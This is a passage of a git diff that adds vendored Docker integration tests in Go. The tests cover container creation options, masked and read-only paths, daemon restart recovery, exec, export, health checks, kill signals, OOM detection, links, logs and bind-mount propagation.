'/'", + }, + { + target: "//", + expectedError: "destination can't be '/'", + }, + } + + for _, tc := range testCases { + _, err := client.ContainerCreate(context.Background(), + &container.Config{ + Image: "busybox", + }, + &container.HostConfig{ + Tmpfs: map[string]string{tc.target: ""}, + }, + &network.NetworkingConfig{}, + "", + ) + assert.Check(t, is.ErrorContains(err, tc.expectedError)) + } +} +func TestCreateWithCustomMaskedPaths(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + testCases := []struct { + maskedPaths []string + expected []string + }{ + { + maskedPaths: []string{}, + expected: []string{}, + }, + { + maskedPaths: nil, + expected: oci.DefaultSpec().Linux.MaskedPaths, + }, + { + maskedPaths: []string{"/proc/kcore", "/proc/keys"}, + expected: []string{"/proc/kcore", "/proc/keys"}, + }, + } + + checkInspect := func(t *testing.T, ctx context.Context, name string, expected []string) { + _, b, err := client.ContainerInspectWithRaw(ctx, name, false) + assert.NilError(t, err) + + var inspectJSON map[string]interface{} + err = json.Unmarshal(b, &inspectJSON) + assert.NilError(t, err) + + cfg, ok := inspectJSON["HostConfig"].(map[string]interface{}) + assert.Check(t, is.Equal(true, ok), name) + + maskedPaths, ok := cfg["MaskedPaths"].([]interface{}) + assert.Check(t, is.Equal(true, ok), name) + + mps := []string{} + for _, mp := range maskedPaths { + mps = append(mps, mp.(string)) + } + + assert.DeepEqual(t, expected, mps) + } + + for i, tc := range testCases { + name := fmt.Sprintf("create-masked-paths-%d", i) + config := container.Config{ + Image: "busybox", + Cmd: []string{"true"}, + } + hc := container.HostConfig{} + if tc.maskedPaths != nil { + hc.MaskedPaths = tc.maskedPaths + } + + // Create the container. + c, err := client.ContainerCreate(context.Background(), + &config, + &hc, + &network.NetworkingConfig{}, + name, + ) + assert.NilError(t, err) + + checkInspect(t, ctx, name, tc.expected) + + // Start the container. + err = client.ContainerStart(ctx, c.ID, types.ContainerStartOptions{}) + assert.NilError(t, err) + + poll.WaitOn(t, ctr.IsInState(ctx, client, c.ID, "exited"), poll.WithDelay(100*time.Millisecond)) + + checkInspect(t, ctx, name, tc.expected) + } +} + +func TestCreateWithCustomReadonlyPaths(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + testCases := []struct { + doc string + readonlyPaths []string + expected []string + }{ + { + readonlyPaths: []string{}, + expected: []string{}, + }, + { + readonlyPaths: nil, + expected: oci.DefaultSpec().Linux.ReadonlyPaths, + }, + { + readonlyPaths: []string{"/proc/asound", "/proc/bus"}, + expected: []string{"/proc/asound", "/proc/bus"}, + }, + } + + checkInspect := func(t *testing.T, ctx context.Context, name string, expected []string) { + _, b, err := client.ContainerInspectWithRaw(ctx, name, false) + assert.NilError(t, err) + + var inspectJSON map[string]interface{} + err = json.Unmarshal(b, &inspectJSON) + assert.NilError(t, err) + + cfg, ok := inspectJSON["HostConfig"].(map[string]interface{}) + assert.Check(t, is.Equal(true, ok), name) + + readonlyPaths, ok := cfg["ReadonlyPaths"].([]interface{}) + assert.Check(t, is.Equal(true, ok), name) + + rops := []string{} + for _, rop := range readonlyPaths { + rops = append(rops, rop.(string)) + } + assert.DeepEqual(t, expected, rops) + } + + for i, tc := range testCases { + name := fmt.Sprintf("create-readonly-paths-%d", i) + config := container.Config{ + Image: "busybox", + Cmd: []string{"true"}, + } + hc := container.HostConfig{} + if tc.readonlyPaths != nil { + hc.ReadonlyPaths = tc.readonlyPaths + } + + // Create the container. + c, err := client.ContainerCreate(context.Background(), + &config, + &hc, + &network.NetworkingConfig{}, + name, + ) + assert.NilError(t, err) + + checkInspect(t, ctx, name, tc.expected) + + // Start the container. + err = client.ContainerStart(ctx, c.ID, types.ContainerStartOptions{}) + assert.NilError(t, err) + + poll.WaitOn(t, ctr.IsInState(ctx, client, c.ID, "exited"), poll.WithDelay(100*time.Millisecond)) + + checkInspect(t, ctx, name, tc.expected) + } +} diff --git a/vendor/github.com/docker/docker/integration/container/daemon_linux_test.go b/vendor/github.com/docker/docker/integration/container/daemon_linux_test.go new file mode 100644 index 0000000000..bc5c5076b8 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/daemon_linux_test.go @@ -0,0 +1,78 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "fmt" + "io/ioutil" + "strconv" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/daemon" + "golang.org/x/sys/unix" + "gotest.tools/assert" + "gotest.tools/skip" +) + +// This is a regression test for #36145 +// It ensures that a container can be started when the daemon was improperly +// shutdown when the daemon is brought back up. +// +// The regression is due to improper error handling preventing a container from +// being restored and as such have the resources cleaned up. +// +// To test this, we need to kill dockerd, then kill both the containerd-shim and +// the container process, then start dockerd back up and attempt to start the +// container again. +func TestContainerStartOnDaemonRestart(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon, "cannot start daemon on remote test run") + t.Parallel() + + d := daemon.New(t) + d.StartWithBusybox(t, "--iptables=false") + defer d.Stop(t) + + client, err := d.NewClient() + assert.Check(t, err, "error creating client") + + ctx := context.Background() + + cID := container.Create(t, ctx, client) + defer client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{Force: true}) + + err = client.ContainerStart(ctx, cID, types.ContainerStartOptions{}) + assert.Check(t, err, "error starting test container") + + inspect, err := client.ContainerInspect(ctx, cID) + assert.Check(t, err, "error getting inspect data") + + ppid := getContainerdShimPid(t, inspect) + + err = d.Kill() + assert.Check(t, err, "failed to kill test daemon") + + err = unix.Kill(inspect.State.Pid, unix.SIGKILL) + assert.Check(t, err, "failed to kill container process") + + err = unix.Kill(ppid, unix.SIGKILL) + assert.Check(t, err, "failed to kill containerd-shim") + + d.Start(t, "--iptables=false") + + err = client.ContainerStart(ctx, cID, types.ContainerStartOptions{}) + assert.Check(t, err, "failed to start test container") +} + +func getContainerdShimPid(t *testing.T, c types.ContainerJSON) int { + statB, err := ioutil.ReadFile(fmt.Sprintf("/proc/%d/stat", c.State.Pid)) + assert.Check(t, err, "error looking up containerd-shim pid") + + // ppid is the 4th entry in `/proc/pid/stat` + ppid, err := strconv.Atoi(strings.Fields(string(statB))[3]) + assert.Check(t, err, "error converting ppid field to int") + + assert.Check(t, ppid != 1, "got unexpected ppid") + return ppid +} diff --git a/vendor/github.com/docker/docker/integration/container/diff_test.go b/vendor/github.com/docker/docker/integration/container/diff_test.go new file mode 100644 index 0000000000..b4219c3627 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/diff_test.go @@ -0,0 +1,42 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "testing" + "time" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/archive" + "gotest.tools/assert" + "gotest.tools/poll" +) + +func TestDiff(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", `mkdir /foo; echo xyzzy > /foo/bar`)) + + // Wait for it to exit as cannot diff a running container on Windows, and + // it will take a few seconds to exit. Also there's no way in Windows to + // differentiate between an Add or a Modify, and all files are under + // a "Files/" prefix. + expected := []containertypes.ContainerChangeResponseItem{ + {Kind: archive.ChangeAdd, Path: "/foo"}, + {Kind: archive.ChangeAdd, Path: "/foo/bar"}, + } + if testEnv.OSType == "windows" { + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond), poll.WithTimeout(60*time.Second)) + expected = []containertypes.ContainerChangeResponseItem{ + {Kind: archive.ChangeModify, Path: "Files/foo"}, + {Kind: archive.ChangeModify, Path: "Files/foo/bar"}, + } + } + + items, err := client.ContainerDiff(ctx, cID) + assert.NilError(t, err) + assert.DeepEqual(t, expected, items) +} diff --git a/vendor/github.com/docker/docker/integration/container/exec_test.go b/vendor/github.com/docker/docker/integration/container/exec_test.go new file mode 100644 index 0000000000..85f9e05915 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/exec_test.go @@ -0,0 +1,50 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "io/ioutil" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestExec(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.35"), "broken in earlier versions") + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + cID := container.Run(t, ctx, client, container.WithTty(true), container.WithWorkingDir("/root")) + + id, err := client.ContainerExecCreate(ctx, cID, + types.ExecConfig{ + WorkingDir: "/tmp", + Env: strslice.StrSlice([]string{"FOO=BAR"}), + AttachStdout: true, + Cmd: strslice.StrSlice([]string{"sh", "-c", "env"}), + }, + ) + assert.NilError(t, err) + + resp, err := client.ContainerExecAttach(ctx, id.ID, + types.ExecStartCheck{ + Detach: false, + Tty: false, + }, + ) + assert.NilError(t, err) + defer resp.Close() + r, err := ioutil.ReadAll(resp.Reader) + assert.NilError(t, err) + out := string(r) + assert.NilError(t, err) + assert.Assert(t, is.Contains(out, "PWD=/tmp"), "exec command not running in expected /tmp working directory") + assert.Assert(t, is.Contains(out, "FOO=BAR"), "exec command not running with expected environment variable FOO") +} diff --git a/vendor/github.com/docker/docker/integration/container/export_test.go b/vendor/github.com/docker/docker/integration/container/export_test.go new file mode 100644 index 0000000000..7a9ed0aa99 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/export_test.go @@ -0,0 +1,78 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "encoding/json" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/daemon" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/jsonmessage" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +// export an image and try to import it into a new one +func TestExportContainerAndImportImage(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, container.WithCmd("true")) + poll.WaitOn(t, container.IsStopped(ctx, client, cID), poll.WithDelay(100*time.Millisecond)) + + reference := "repo/testexp:v1" + exportResp, err := client.ContainerExport(ctx, cID) + assert.NilError(t, err) + importResp, err := client.ImageImport(ctx, types.ImageImportSource{ + Source: exportResp, + SourceName: "-", + }, reference, types.ImageImportOptions{}) + assert.NilError(t, err) + + // If the import is successfully, then the message output should contain + // the image ID and match with the output from `docker images`. + + dec := json.NewDecoder(importResp) + var jm jsonmessage.JSONMessage + err = dec.Decode(&jm) + assert.NilError(t, err) + + images, err := client.ImageList(ctx, types.ImageListOptions{ + Filters: filters.NewArgs(filters.Arg("reference", reference)), + }) + assert.NilError(t, err) + assert.Check(t, is.Equal(jm.Status, images[0].ID)) +} + +// TestExportContainerAfterDaemonRestart checks that a container +// created before start of the currently running dockerd +// can be exported (as reported in #36561). To satisfy this +// condition, daemon restart is needed after container creation. +func TestExportContainerAfterDaemonRestart(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, testEnv.IsRemoteDaemon()) + + d := daemon.New(t) + client, err := d.NewClient() + assert.NilError(t, err) + + d.StartWithBusybox(t) + defer d.Stop(t) + + ctx := context.Background() + ctrID := container.Create(t, ctx, client) + + d.Restart(t) + + _, err = client.ContainerExport(ctx, ctrID) + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/integration/container/health_test.go b/vendor/github.com/docker/docker/integration/container/health_test.go new file mode 100644 index 0000000000..7cc196e46d --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/health_test.go @@ -0,0 +1,47 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "testing" + "time" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/poll" +) + +// TestHealthCheckWorkdir verifies that health-checks inherit the containers' +// working-dir. +func TestHealthCheckWorkdir(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + cID := container.Run(t, ctx, client, container.WithTty(true), container.WithWorkingDir("/foo"), func(c *container.TestContainerConfig) { + c.Config.Healthcheck = &containertypes.HealthConfig{ + Test: []string{"CMD-SHELL", "if [ \"$PWD\" = \"/foo\" ]; then exit 0; else exit 1; fi;"}, + Interval: 50 * time.Millisecond, + Retries: 3, + } + }) + + poll.WaitOn(t, pollForHealthStatus(ctx, client, cID, types.Healthy), poll.WithDelay(100*time.Millisecond)) +} + +func pollForHealthStatus(ctx context.Context, client client.APIClient, containerID string, healthStatus string) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + inspect, err := client.ContainerInspect(ctx, containerID) + + switch { + case err != nil: + return poll.Error(err) + case inspect.State.Health.Status == healthStatus: + return poll.Success() + default: + return poll.Continue("waiting for container to become %s", healthStatus) + } + } +} diff --git a/vendor/github.com/docker/docker/integration/container/inspect_test.go b/vendor/github.com/docker/docker/integration/container/inspect_test.go new file mode 100644 index 0000000000..d034c53650 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/inspect_test.go @@ -0,0 +1,48 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "encoding/json" + "testing" + "time" + + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestInspectCpusetInConfigPre120(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux" || !testEnv.DaemonInfo.CPUSet) + + defer setupTest(t)() + client := request.NewAPIClient(t, client.WithVersion("1.19")) + ctx := context.Background() + + name := "cpusetinconfig-pre120-" + t.Name() + // Create container with up to-date-API + container.Run(t, ctx, request.NewAPIClient(t), container.WithName(name), + container.WithCmd("true"), + func(c *container.TestContainerConfig) { + c.HostConfig.Resources.CpusetCpus = "0" + }, + ) + poll.WaitOn(t, container.IsInState(ctx, client, name, "exited"), poll.WithDelay(100*time.Millisecond)) + + _, body, err := client.ContainerInspectWithRaw(ctx, name, false) + assert.NilError(t, err) + + var inspectJSON map[string]interface{} + err = json.Unmarshal(body, &inspectJSON) + assert.NilError(t, err, "unable to unmarshal body for version 1.19: %s", err) + + config, ok := inspectJSON["Config"] + assert.Check(t, is.Equal(true, ok), "Unable to find 'Config'") + + cfg := config.(map[string]interface{}) + _, ok = cfg["Cpuset"] + assert.Check(t, is.Equal(true, ok), "API version 1.19 expected to include Cpuset in 'Config'") +} diff --git a/vendor/github.com/docker/docker/integration/container/kill_test.go b/vendor/github.com/docker/docker/integration/container/kill_test.go new file mode 100644 index 0000000000..12a9083cf3 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/kill_test.go @@ -0,0 +1,183 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "testing" + "time" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestKillContainerInvalidSignal(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + id := container.Run(t, ctx, client) + + err := client.ContainerKill(ctx, id, "0") + assert.Error(t, err, "Error response from daemon: Invalid signal: 0") + poll.WaitOn(t, container.IsInState(ctx, client, id, "running"), poll.WithDelay(100*time.Millisecond)) + + err = client.ContainerKill(ctx, id, "SIG42") + assert.Error(t, err, "Error response from daemon: Invalid signal: SIG42") + poll.WaitOn(t, container.IsInState(ctx, client, id, "running"), poll.WithDelay(100*time.Millisecond)) +} + +func TestKillContainer(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + + testCases := []struct { + doc string + signal string + status string + }{ + { + doc: "no signal", + signal: "", + status: "exited", + }, + { + doc: "non killing signal", + signal: "SIGWINCH", + status: "running", + }, + { + doc: "killing signal", + signal: "SIGTERM", + status: "exited", + }, + } + + for _, tc := range testCases { + tc := tc + t.Run(tc.doc, func(t *testing.T) { + ctx := context.Background() + id := container.Run(t, ctx, client) + err := client.ContainerKill(ctx, id, tc.signal) + assert.NilError(t, err) + + poll.WaitOn(t, container.IsInState(ctx, client, id, tc.status), poll.WithDelay(100*time.Millisecond)) + }) + } +} + +func TestKillWithStopSignalAndRestartPolicies(t *testing.T) { + skip.If(t, testEnv.OSType != "linux", "Windows only supports 1.25 or later") + defer setupTest(t)() + client := request.NewAPIClient(t) + + testCases := []struct { + doc string + stopsignal string + status string + }{ + { + doc: "same-signal-disables-restart-policy", + stopsignal: "TERM", + status: "exited", + }, + { + doc: "different-signal-keep-restart-policy", + stopsignal: "CONT", + status: "running", + }, + } + + for _, tc := range testCases { + tc := tc + t.Run(tc.doc, func(t *testing.T) { + ctx := context.Background() + id := container.Run(t, ctx, client, func(c *container.TestContainerConfig) { + c.Config.StopSignal = tc.stopsignal + c.HostConfig.RestartPolicy = containertypes.RestartPolicy{ + Name: "always", + } + }) + err := client.ContainerKill(ctx, id, "TERM") + assert.NilError(t, err) + + poll.WaitOn(t, container.IsInState(ctx, client, id, tc.status), poll.WithDelay(100*time.Millisecond)) + }) + } +} + +func TestKillStoppedContainer(t *testing.T) { + skip.If(t, testEnv.OSType != "linux") // Windows only supports 1.25 or later + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + id := container.Create(t, ctx, client) + err := client.ContainerKill(ctx, id, "SIGKILL") + assert.Assert(t, is.ErrorContains(err, "")) + assert.Assert(t, is.Contains(err.Error(), "is not running")) +} + +func TestKillStoppedContainerAPIPre120(t *testing.T) { + skip.If(t, testEnv.OSType != "linux") // Windows only supports 1.25 or later + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t, client.WithVersion("1.19")) + id := container.Create(t, ctx, client) + err := client.ContainerKill(ctx, id, "SIGKILL") + assert.NilError(t, err) +} + +func TestKillDifferentUserContainer(t *testing.T) { + // TODO Windows: Windows does not yet support -u (Feb 2016). + skip.If(t, testEnv.OSType != "linux", "User containers (container.Config.User) are not yet supported on %q platform", testEnv.OSType) + + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t, client.WithVersion("1.19")) + + id := container.Run(t, ctx, client, func(c *container.TestContainerConfig) { + c.Config.User = "daemon" + }) + poll.WaitOn(t, container.IsInState(ctx, client, id, "running"), poll.WithDelay(100*time.Millisecond)) + + err := client.ContainerKill(ctx, id, "SIGKILL") + assert.NilError(t, err) + poll.WaitOn(t, container.IsInState(ctx, client, id, "exited"), poll.WithDelay(100*time.Millisecond)) +} + +func TestInspectOomKilledTrue(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux" || !testEnv.DaemonInfo.MemoryLimit || !testEnv.DaemonInfo.SwapLimit) + + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", "x=a; while true; do x=$x$x$x$x; done"), func(c *container.TestContainerConfig) { + c.HostConfig.Resources.Memory = 32 * 1024 * 1024 + }) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond)) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal(true, inspect.State.OOMKilled)) +} + +func TestInspectOomKilledFalse(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux" || !testEnv.DaemonInfo.MemoryLimit || !testEnv.DaemonInfo.SwapLimit) + + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", "echo hello world")) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond)) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal(false, inspect.State.OOMKilled)) +} diff --git a/vendor/github.com/docker/docker/integration/container/links_linux_test.go b/vendor/github.com/docker/docker/integration/container/links_linux_test.go new file mode 100644 index 0000000000..f9f3cbe5ed --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/links_linux_test.go @@ -0,0 +1,57 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "io/ioutil" + "os" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestLinksEtcHostsContentMatch(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon()) + + hosts, err := ioutil.ReadFile("/etc/hosts") + skip.If(t, os.IsNotExist(err)) + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, container.WithNetworkMode("host")) + res, err := container.Exec(ctx, client, cID, []string{"cat", "/etc/hosts"}) + assert.NilError(t, err) + assert.Assert(t, is.Len(res.Stderr(), 0)) + assert.Equal(t, 0, res.ExitCode) + + assert.Check(t, is.Equal(string(hosts), res.Stdout())) +} + +func TestLinksContainerNames(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + containerA := "first_" + t.Name() + containerB := "second_" + t.Name() + container.Run(t, ctx, client, container.WithName(containerA)) + container.Run(t, ctx, client, container.WithName(containerB), container.WithLinks(containerA+":"+containerA)) + + f := filters.NewArgs(filters.Arg("name", containerA)) + + containers, err := client.ContainerList(ctx, types.ContainerListOptions{ + Filters: f, + }) + assert.NilError(t, err) + assert.Check(t, is.Equal(1, len(containers))) + assert.Check(t, is.DeepEqual([]string{"/" + containerA, "/" + containerB + "/" + containerA}, containers[0].Names)) +} diff --git a/vendor/github.com/docker/docker/integration/container/logs_test.go b/vendor/github.com/docker/docker/integration/container/logs_test.go new file mode 100644 index 0000000000..68fbe13a73 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/logs_test.go @@ -0,0 +1,35 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "io/ioutil" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/stdcopy" + "gotest.tools/assert" + "gotest.tools/skip" +) + +// Regression test for #35370 +// Makes sure that when following we don't get an EOF error when there are no logs +func TestLogsFollowTailEmpty(t *testing.T) { + // FIXME(vdemeester) fails on a e2e run on linux... + skip.If(t, testEnv.IsRemoteDaemon()) + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + id := container.Run(t, ctx, client, container.WithCmd("sleep", "100000")) + + logs, err := client.ContainerLogs(ctx, id, types.ContainerLogsOptions{ShowStdout: true, Tail: "2"}) + if logs != nil { + defer logs.Close() + } + assert.Check(t, err) + + _, err = stdcopy.StdCopy(ioutil.Discard, ioutil.Discard, logs) + assert.Check(t, err) +} diff --git a/vendor/github.com/docker/docker/integration/container/main_test.go b/vendor/github.com/docker/docker/integration/container/main_test.go new file mode 100644 index 0000000000..fb87fddcc2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/main_test.go @@ -0,0 +1,33 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/container/mounts_linux_test.go b/vendor/github.com/docker/docker/integration/container/mounts_linux_test.go new file mode 100644 index 0000000000..a0a8836c51 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/mounts_linux_test.go @@ -0,0 +1,208 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "fmt" + "path/filepath" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/client" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/system" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" + "gotest.tools/skip" +) + +func TestContainerNetworkMountsNoChown(t *testing.T) { + // chown only applies to Linux bind mounted volumes; must be same host to verify + skip.If(t, testEnv.DaemonInfo.OSType != "linux" || testEnv.IsRemoteDaemon()) + + defer setupTest(t)() + + ctx := context.Background() + + tmpDir := fs.NewDir(t, "network-file-mounts", fs.WithMode(0755), fs.WithFile("nwfile", "network file bind mount", fs.WithMode(0644))) + defer tmpDir.Remove() + + tmpNWFileMount := tmpDir.Join("nwfile") + + config := container.Config{ + Image: "busybox", + } + hostConfig := container.HostConfig{ + Mounts: []mount.Mount{ + { + Type: "bind", + Source: tmpNWFileMount, + Target: "/etc/resolv.conf", + }, + { + Type: "bind", + Source: tmpNWFileMount, + Target: "/etc/hostname", + }, + { + Type: "bind", + Source: tmpNWFileMount, + Target: "/etc/hosts", + }, + }, + } + + cli, err := client.NewEnvClient() + assert.NilError(t, err) + defer cli.Close() + + ctrCreate, err := cli.ContainerCreate(ctx, &config, &hostConfig, &network.NetworkingConfig{}, "") + assert.NilError(t, err) + // container will exit immediately because of no tty, but we only need the start sequence to test the condition + err = cli.ContainerStart(ctx, ctrCreate.ID, types.ContainerStartOptions{}) + assert.NilError(t, err) + + // Check that host-located bind mount network file did not change ownership when the container was started + // Note: If the user specifies a mountpath from the host, we should not be + // attempting to chown files outside the daemon's metadata directory + // (represented by `daemon.repository` at init time). + // This forces users who want to use user namespaces to handle the + // ownership needs of any external files mounted as network files + // (/etc/resolv.conf, /etc/hosts, /etc/hostname) separately from the + // daemon. In all other volume/bind mount situations we have taken this + // same line--we don't chown host file content. + // See GitHub PR 34224 for details. + statT, err := system.Stat(tmpNWFileMount) + assert.NilError(t, err) + assert.Check(t, is.Equal(uint32(0), statT.UID()), "bind mounted network file should not change ownership from root") +} + +func TestMountDaemonRoot(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux" || testEnv.IsRemoteDaemon()) + t.Parallel() + + client := request.NewAPIClient(t) + ctx := context.Background() + info, err := client.Info(ctx) + if err != nil { + t.Fatal(err) + } + + for _, test := range []struct { + desc string + propagation mount.Propagation + expected mount.Propagation + }{ + { + desc: "default", + propagation: "", + expected: mount.PropagationRSlave, + }, + { + desc: "private", + propagation: mount.PropagationPrivate, + }, + { + desc: "rprivate", + propagation: mount.PropagationRPrivate, + }, + { + desc: "slave", + propagation: mount.PropagationSlave, + }, + { + desc: "rslave", + propagation: mount.PropagationRSlave, + expected: mount.PropagationRSlave, + }, + { + desc: "shared", + propagation: mount.PropagationShared, + }, + { + desc: "rshared", + propagation: mount.PropagationRShared, + expected: mount.PropagationRShared, + }, + } { + t.Run(test.desc, func(t *testing.T) { + test := test + t.Parallel() + + propagationSpec := fmt.Sprintf(":%s", test.propagation) + if test.propagation == "" { + propagationSpec = "" + } + bindSpecRoot := info.DockerRootDir + ":" + "/foo" + propagationSpec + bindSpecSub := filepath.Join(info.DockerRootDir, "containers") + ":/foo" + propagationSpec + + for name, hc := range map[string]*container.HostConfig{ + "bind root": {Binds: []string{bindSpecRoot}}, + "bind subpath": {Binds: []string{bindSpecSub}}, + "mount root": { + Mounts: []mount.Mount{ + { + Type: mount.TypeBind, + Source: info.DockerRootDir, + Target: "/foo", + BindOptions: &mount.BindOptions{Propagation: test.propagation}, + }, + }, + }, + "mount subpath": { + Mounts: []mount.Mount{ + { + Type: mount.TypeBind, + Source: filepath.Join(info.DockerRootDir, "containers"), + Target: "/foo", + BindOptions: &mount.BindOptions{Propagation: test.propagation}, + }, + }, + }, + } { + t.Run(name, func(t *testing.T) { + hc := hc + t.Parallel() + + c, err := client.ContainerCreate(ctx, &container.Config{ + Image: "busybox", + Cmd: []string{"true"}, + }, hc, nil, "") + + if err != nil { + if test.expected != "" { + t.Fatal(err) + } + // expected an error, so this is ok and should not continue + return + } + if test.expected == "" { + t.Fatal("expected create to fail") + } + + defer func() { + if err := client.ContainerRemove(ctx, c.ID, types.ContainerRemoveOptions{Force: true}); err != nil { + panic(err) + } + }() + + inspect, err := client.ContainerInspect(ctx, c.ID) + if err != nil { + t.Fatal(err) + } + if len(inspect.Mounts) != 1 { + t.Fatalf("unexpected number of mounts: %+v", inspect.Mounts) + } + + m := inspect.Mounts[0] + if m.Propagation != test.expected { + t.Fatalf("got unexpected propagation mode, expected %q, got: %v", test.expected, m.Propagation) + } + }) + } + }) + } +} diff --git a/vendor/github.com/docker/docker/integration/container/nat_test.go b/vendor/github.com/docker/docker/integration/container/nat_test.go new file mode 100644 index 0000000000..0dbed897db 